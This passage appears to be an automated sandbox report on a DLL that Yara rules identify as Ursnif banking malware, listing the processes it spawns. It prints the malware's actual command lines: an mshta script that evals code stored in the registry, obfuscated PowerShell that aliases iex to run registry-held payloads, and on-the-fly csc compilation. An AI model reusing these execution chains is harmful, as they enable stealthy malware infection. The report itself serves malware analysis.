                  Data Ascii: eWIyeh91PBBn1Vj6e4MoNbYmvlX0N0Koo4J3vAGv1iZazzP4FH89lJcx0/t6pX6WgSwlrjhMtB7GrezNf7sN0dlDikpeZ3+D5/d/Pn7Z3j0jQ3yIfn2cqOn5AfZac11NJyWhtUvjNBBBQcjZgsHHbu3tL+bcUCJZBr7YWHAoc/yz2eugJyqyO0Bjd3SYRLcVtSbOaF3Z9pc0+PpKqslssmQndIYU+sr055wnZDaniOVq0FFHejYfMM8tSCAPmkOsLMoTk67fhTSGGn/Y/CArWXQiyMMGtK9OHYcA0xWGbsxzNpBmhLIyYA/sszkn2RgOYa9eRgVzquB+cGAJJQIJfmM3soMP0nxn3RHoCcL7eVcSYC4oQdM+4muFnKj5RZb+RgCPoRtab1wfc2JFWXf/kxXF4/+842BeDS+x2C6aeZJj7ocyOrTfdwXVV49GV6AOwnpBFv/bhqedJSYWdLV5gYlHTD6Wgbduq7FGVpYHSalrKzM8YagbIykHH3l+hoJqjlZ2Q3VNX+KngX82cNlC+CiAGWYH4H/Stf7EGf6P1haJy6yOvWE3TwujvgvVmKrZiGXuWBK8lCNomGfwTnFEyzHtXsCX1F8t2iP2rykmr0I3wLZsqLCuH/TrSQ9AjLSmOuCt8XS5Zly1LSzEyaaz6xV1fWkHqp1bLvSwTcfK7/2Tmf+B6X4coWW0CDO/3ryp4xr8CdVqxEkLafocagB+HnZq5jhIp4LOR9FqmVK8aRW8hAiROWB+lFPJkTqs0j9OhFGt9ALOb53dYd93E2ZoUMiXhdVh+seOCbPJ2KIyMWHJL8b+0xR1LV8tZpXXxKuyF29Ic3kIApMNvpf2aVmkNZ9xiutNx01n/HrnTjVxGYXDPCYJkm85lt0JCoy++ryBlx5q7m3DEyABBNm/K8xIPKckeJMPljhOcWcnS8dCN1bk7kNiTb0O2tHbKMKL3CaqhGzGGQMNTDorEsWKDd+38W6usimK5Q/A9A7


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: loaddll32.exe PID: 5624 Parent PID: 4556

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\status.dll"
                  Imagebase:0xbb0000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Analysis Process: cmd.exe PID: 4792 Parent PID: 5624

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
                  Imagebase:0xd80000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: regsvr32.exe PID: 2944 Parent PID: 5624

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit):true
                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\status.dll
                  Imagebase:0x970000
                  File size:20992 bytes
                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Analysis Process: rundll32.exe PID: 5268 Parent PID: 4792

                  General

                  Start time:11:50:08
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\status.dll",#1
                  Imagebase:0xae0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000005.00000003.463693625.000000000308F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Analysis Process: rundll32.exe PID: 5784 Parent PID: 5624

                  General

                  Start time:11:50:09
                  Start date:19/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
                  Imagebase:0xae0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000006.00000002.476168753.000000000069B000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 3608 Parent PID: 744

                  General

                  Start time:11:50:23
                  Start date:19/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff722910000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 5880 Parent PID: 3608

                  General

                  Start time:11:50:25
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 2132 Parent PID: 3608

                  General

                  Start time:11:50:29
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 5828 Parent PID: 3608

                  General

                  Start time:11:50:30
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 5272 Parent PID: 3608

                  General

                  Start time:11:50:31
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: iexplore.exe PID: 7100 Parent PID: 3608

                  General

                  Start time:11:50:34
                  Start date:19/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
                  Imagebase:0x3f0000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: mshta.exe PID: 6304 Parent PID: 5784

                  General

                  Start time:11:50:39
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: powershell.exe PID: 5008 Parent PID: 6304

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, Author: Joe Security

                  Analysis Process: mshta.exe PID: 620 Parent PID: 5624

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: conhost.exe PID: 5960 Parent PID: 5008

                  General

                  Start time:11:50:42
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: powershell.exe PID: 6944 Parent PID: 620

                  General

                  Start time:11:50:45
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, Author: Joe Security

                  Analysis Process: conhost.exe PID: 6324 Parent PID: 6944

                  General

                  Start time:11:50:46
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: mshta.exe PID: 6100 Parent PID: 5268

                  General

                  Start time:11:50:48
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000021.00000002.386067444.00000121EDC9B000.00000004.00000001.sdmp, Author: Florian Roth

                  Analysis Process: mshta.exe PID: 2948 Parent PID: 2944

                  General

                  Start time:11:50:50
                  Start date:19/01/2022
                  Path:C:\Windows\System32\mshta.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                  Imagebase:0x7ff76e720000
                  File size:14848 bytes
                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: powershell.exe PID: 2176 Parent PID: 6100

                  General

                  Start time:11:50:51
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: conhost.exe PID: 7160 Parent PID: 2176

                  General

                  Start time:11:50:51
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: powershell.exe PID: 1676 Parent PID: 2948

                  General

                  Start time:11:50:53
                  Start date:19/01/2022
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                  Imagebase:0x7ff777fc0000
                  File size:447488 bytes
                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: conhost.exe PID: 6416 Parent PID: 1676

                  General

                  Start time:11:50:53
                  Start date:19/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7f20f0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: csc.exe PID: 6072 Parent PID: 6944

                  General

                  Start time:11:51:00
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: csc.exe PID: 3396 Parent PID: 5008

                  General

                  Start time:11:51:01
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: control.exe PID: 6328 Parent PID: 5784

                  General

                  Start time:11:51:01
                  Start date:19/01/2022
                  Path:C:\Windows\System32\control.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\control.exe -h
                  Imagebase:0x7ff691270000
                  File size:117760 bytes
                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: csc.exe PID: 3176 Parent PID: 2176

                  General

                  Start time:11:51:02
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: cvtres.exe PID: 2932 Parent PID: 6072

                  General

                  Start time:11:51:03
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: csc.exe PID: 6548 Parent PID: 1676

                  General

                  Start time:11:51:04
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: cvtres.exe PID: 6688 Parent PID: 3396

                  General

                  Start time:11:51:04
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: cvtres.exe PID: 4960 Parent PID: 3176

                  General

                  Start time:11:51:05
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: cvtres.exe PID: 6612 Parent PID: 6548

                  General

                  Start time:11:51:06
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
                  Imagebase:0x7ff721ff0000
                  File size:47280 bytes
                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: control.exe PID: 6672 Parent PID: 5624

                  General

                  Start time:11:51:06
                  Start date:19/01/2022
                  Path:C:\Windows\System32\control.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\control.exe -h
                  Imagebase:0x7ff691270000
                  File size:117760 bytes
                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: rundll32.exe PID: 6236 Parent PID: 6328

                  General

                  Start time:11:51:07
                  Start date:19/01/2022
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                  Imagebase:0x7ff700140000
                  File size:69632 bytes
                  MD5 hash:73C519F050C20580F8A62C849D49215A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Analysis Process: csc.exe PID: 3672 Parent PID: 6944

                  General

                  Start time:11:51:09
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
                  Imagebase:0x7ff71aa50000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: csc.exe PID: 2952 Parent PID: 5008

                  General

                  Start time:11:51:10
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
                  Imagebase:0x7ff66e020000
                  File size:2739304 bytes
                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  Analysis Process: csc.exe PID: 3860 Parent PID: 2176

                  General

                  Start time:11:51:11
                  Start date:19/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  Wow64 process (32bit):false
